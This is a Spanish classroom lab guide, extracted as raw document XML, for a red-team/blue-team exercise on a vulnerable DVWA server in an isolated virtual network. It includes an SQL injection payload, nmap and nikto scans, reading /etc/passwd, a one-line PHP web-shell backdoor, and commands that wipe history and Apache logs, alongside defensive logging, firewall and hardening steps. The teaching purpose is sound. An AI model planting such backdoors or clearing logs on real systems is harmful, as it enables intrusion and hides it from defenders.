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hbm0yqbbj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Configuración de Red (Crucial)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VirtualBox o VMware, selecciona las 3 máquinas y asegúrate de que están en la misma red.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 &gt; Red &gt; Conectado a:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Red Interna" (nómbrala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proyectofp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aislará el tráfico: el Red Team podrá atacar a la Víctima, pero nada saldrá a internet (evitando problemas con el router del centro).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zi06uox15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Preparación de la Víctima (Ubuntu + DVWA)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DVWA (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Damn Vulnerable Web Application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) es un servidor PHP/MySQL diseñado para ser hackeado.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769vfaqvi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A: Instalar Apache, MySQL y PHP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máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu Víctima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, abre la terminal y ejecuta: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sudo apt update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sudo apt install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php -y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gpo9y5irc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B: Instalar DVWA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 el repositorio (o clónalo desde GitHub):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/var/www/html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git clone https://github.com/digininja/DVWA.git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permisos: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chown -R www-data:www-data /var/www/html/DVWA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la base de datos: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 en MySQL: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mysql -u root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la DB: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dvwa;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 usuario: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USER 'dvwa_user'@'localhost' IDENTIFIED BY 'password';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 permisos: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 ALL PRIVILEGES ON dvwa.* TO 'dvwa_user'@'localhost';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¡Perfecto! Vamos a empezar por los cimientos. Para que el proyecto no se rompa a mitad de camino, lo primero es dejar listo el </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Escenario de Red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Máquina Víctima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, que es la que recibirá toda la acción.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la </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Fase 1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">: Configuración del entorno y preparación de la víctima.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ahtgc8qmj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Configuración de Red (Crucial)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VirtualBox o VMware, selecciona las 3 máquinas y asegúrate de que están en la misma red.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 &gt; Red &gt; Conectado a:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> "Red Interna" (nómbrala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proyectofp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aislará el tráfico: el Red Team podrá atacar a la Víctima, pero nada saldrá a internet (evitando problemas con el router del centro).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1ujjxut57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Preparación de la Víctima (Ubuntu + DVWA)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DVWA (</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Damn Vulnerable Web Application</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) es un servidor PHP/MySQL diseñado para ser hackeado.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juz8yiotn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A: Instalar Apache, MySQL y PHP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máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Ubuntu Víctima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, abre la terminal y ejecuta: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apt install apache2 mariadb-server php php-mysqli php-gd libapache2-mod-php -y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5vmektyrb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B: Instalar DVWA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 el repositorio (o clónalo desde GitHub):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/var/www/html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git clone https://github.com/digininja/DVWA.git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permisos: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chown -R www-data:www-data /var/www/html/DVWA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la base de datos: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 en MySQL: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mysql -u root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la DB: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dvwa;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 usuario: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USER 'dvwa_user'@'localhost' IDENTIFIED BY 'password';</w:t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 permisos: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 ALL PRIVILEGES ON dvwa.* TO 'dvwa_user'@'localhost';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oimthwzclb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obdjexdc6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1: Fase Blue Team: "El Guardián" (Logging)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que el Red Team toque nada, el Blue Team debe preparar sus "ojos".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lrq62m7li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Activando la monitorización básica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máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Víctima</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (o en la de monitorización si usáis SSH), el Blue Team debe dejar preparada esta ventana para ver los ataques en tiempo real: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Para ver quién accede a la web en vivo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sudo tail -f /var/log/apache2/access.log</w:t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Captura de pantalla recomendada:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Muestra los logs vacíos antes del ataque para demostrar el "estado inicial" del sistema.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s2xgi68ido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xgmp43j0j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🟥Paso 1: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Red Team: "El Explorador" (Reconocimiento)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máquina </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Kali</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, lo primero es saber si la víctima está viva.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2wlrrcmn2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primer comando de Nmap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nmap -sV -p 80,22,3306 192.168.1.X  (sustituye X por la IP de la víctima)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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-sV:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Detecta la versión del software (Apache 2.4, etc.).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-p:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Escanea solo los puertos de la Web, SSH y Base de Datos.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295275</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="6222291" cy="1405700"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:wrapTopAndBottom distB="114300" distT="11430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2291" cy="140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wk3zmnesm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Paso 2: Ataque (Red Team) - Vulnerabilidad de SQL Injection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usar una de las vulnerabilidades más clásicas presentes en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. El objetivo es extraer nombres de usuario de la base de datos que no deberían ser públicos.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Entrar en DVWA:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Abre el navegador en Kali y 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http://192.168.0.79/DVWA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Usuario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contraseña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  <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> En el menú de la izquierda, haz clic en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">DVWA Security</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y asegúrate de que el nivel esté en </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Low"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. Dale a "Submit".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Inyección:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ve a la sección </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1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Payload:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> En el cuadro de búsqueda (User ID), introduce lo siguiente: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%' OR '1'='1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hace esto?</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Altera la consulta SQL para que siempre sea verdadera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1=1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">), obligando a la base de datos a volcar todos los usuarios.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460500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7y1btiru8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2: Defensa (Blue Team) - Análisis de Logs de Apache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el atacante juega con la web, el Blue Team debe identificar qué está pasando sin mirar la pantalla del atacante.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Monitorizar accesos:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> En la máquina víctima, ejecuta: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sudo tail -f /var/log/apache2/access.log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Identificar el ataque:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Veréis líneas que contienen caracteres extraños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%27</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (que es la comilla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 en formato URL) y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OR+1%3D1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Captura de pantalla obligatoria:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El Blue Team debe capturar esa línea del log donde se ve el intento de inyección SQL. Es la prueba del incidente.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8867" cy="1935199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67" cy="193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ngfyx5qqx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Paso 3: Ataque (Red Team) - Escaneo de vulnerabilidades con Nikto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ser más agresivos, el Red Team usará una herramienta automática para buscar archivos sensibles.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Ejecutar Nikto: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nikto -h http://192.168.0.79/DVWA</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl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Esto buscará directorios ocultos, versiones de servidor desactualizadas y scripts vulnerables.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638300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fj2ijrgsf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3: Respuesta ante Incidentes (Blue Team) - Bloqueo (UFW)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el profesor te dice: </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:i w:val="1"/>
          <w:iCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"¡El ataque es demasiado fuerte, cortad el acceso!"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">. El Blue Team debe reaccionar.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la IP del atacante:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (Saldrá en los logs de Apache,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192.168.0.XX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 inmediato con Firewall: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sudo ufw deny from 192.168.0.XX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1"/>
          <w:numId w:val="18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A partir de ese momento, el Red Team verá que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nikto</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o su navegador dejan de cargar la página. </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Esa es vuestra victoria.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hfrcwizddh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ia43hdkn7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4: Hardening (Blue Team)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Blue Team debe realizar cambios permanentes para que, aunque el firewall se apague, el sistema sea seguro.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Asegurar SSH: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 el archivo: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nano /etc/ssh/sshd_config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PermitRootLogin yes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PermitRootLogin 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Cambia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 22</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> por uno alto,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 2222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Reinicia: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restart ssh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Captura:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El Red Team intentando entrar por el puerto 22 y recibiendo un "Connection Refused".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67350" cy="62865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Parchear la Web (DVWA):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Cambia el nivel de seguridad de DVWA de "Low" a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"High"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Intentad de nuevo la Inyección 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OR '1'='1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">). Veréis que ya no funciona.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Captura:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> El mensaje de error o la falta de resultados en DVWA tras subir la seguridad.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myqv4mitz3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m4sf171wn8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Paso 5: Persistencia y Post-Explotación (Red Team)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tenéis los comandos exactos y lo que significan para vuestro informe de FP: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fo05b9hxd6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Enumeración del Sistema (¿Quién soy y qué hay aquí?)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Red Team debe saber qué privilegios tiene. Si eres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www-data</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (el usuario de Apache), tienes límites; si eres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, tienes el control total.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whoami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Saber el nombre del usuario con el que has entrado.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uname -a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 la versión del Kernel de Linux. (Útil para buscar exploits de "Escalada de Privilegios").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-la /var/www/html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Listar los archivos de la web. Aquí podrías encontrar archivos de configuración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config.inc.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">) que a veces tienen contraseñas de la base de datos en texto plano.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kw6kx7crjp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Búsqueda de "Tesoros" (Exfiltración)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atacante siempre busca archivos con información de usuarios o configuraciones del sistema.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/etc/passwd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 todos los usuarios creados en el Ubuntu víctima.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05425" cy="6896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/etc/Shosts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 si la víctima está conectada a otras máquinas internas de la "empresa".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woruh9zhyo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Persistencia (Dejar una "puerta trasera")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no tener que volver a hackear la web cada vez, el Red Team suele crear un nuevo usuario o dejar un script oculto.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Crear un archivo "Backdoor" simple en la carpeta web.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'&lt;?php system($_GET["cmd"]); ?&gt;' &gt; /var/www/html/DVWA/shell.php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413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es peligroso:</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Ahora, el Red Team puede ejecutar comandos desde el navegador simplemente entrando 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http://192.168.0.79/DVWA/shell.php?cmd=whoami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jhvw5lhuq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Paso 6: Red Team - Borrado de Huellas (Anti-forense)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atacante real no quiere que lo pillen. Su última misión es borrar los registros donde aparece su dirección IP.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Borrar el historial de comandos:</w:t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Desde vuestra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shell.php</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> o la terminal inyectada, intentad vaciar el archivo donde se guardan los comandos:</w:t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.../shell.php?cmd=history -c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6096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Vandalizar o limpiar logs de Apache:</w:t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Intentad vaciar el log de accesos para que el Blue Team no vea vuestras peticiones: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.../shell.php?cmd=echo "" &gt; /var/log/apache2/access.log</w:t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(Nota: Probablemente os dé error de permiso, lo cual es perfecto para el informe del Blue Team).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8001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dq91yvj0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6: Blue Team - Informe de Daños e Integridad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Blue Team debe certificar que la máquina vuelve a ser segura.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Eliminar la Persistencia:s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rm /var/www/html/DVWA/shell.php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el Firewall final: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ufw status verbose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Aseguraos de que solo los puertos </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">2222</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> (el nuevo SSH) y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 (Web) están permitidos.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Comprobar que el ataque SQL ya no funciona:</w:t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Poned DVWA en nivel </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">"Impossible"</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> y haced la última captura intentando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OR '1'='1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9.png"/><Relationship Id="rId22" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image3.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image11.png"/><Relationship Id="rId21" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image13.png"/><Relationship Id="rId13" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image16.png"/><Relationship Id="rId24" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image17.png"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image5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8.png"/><Relationship Id="rId18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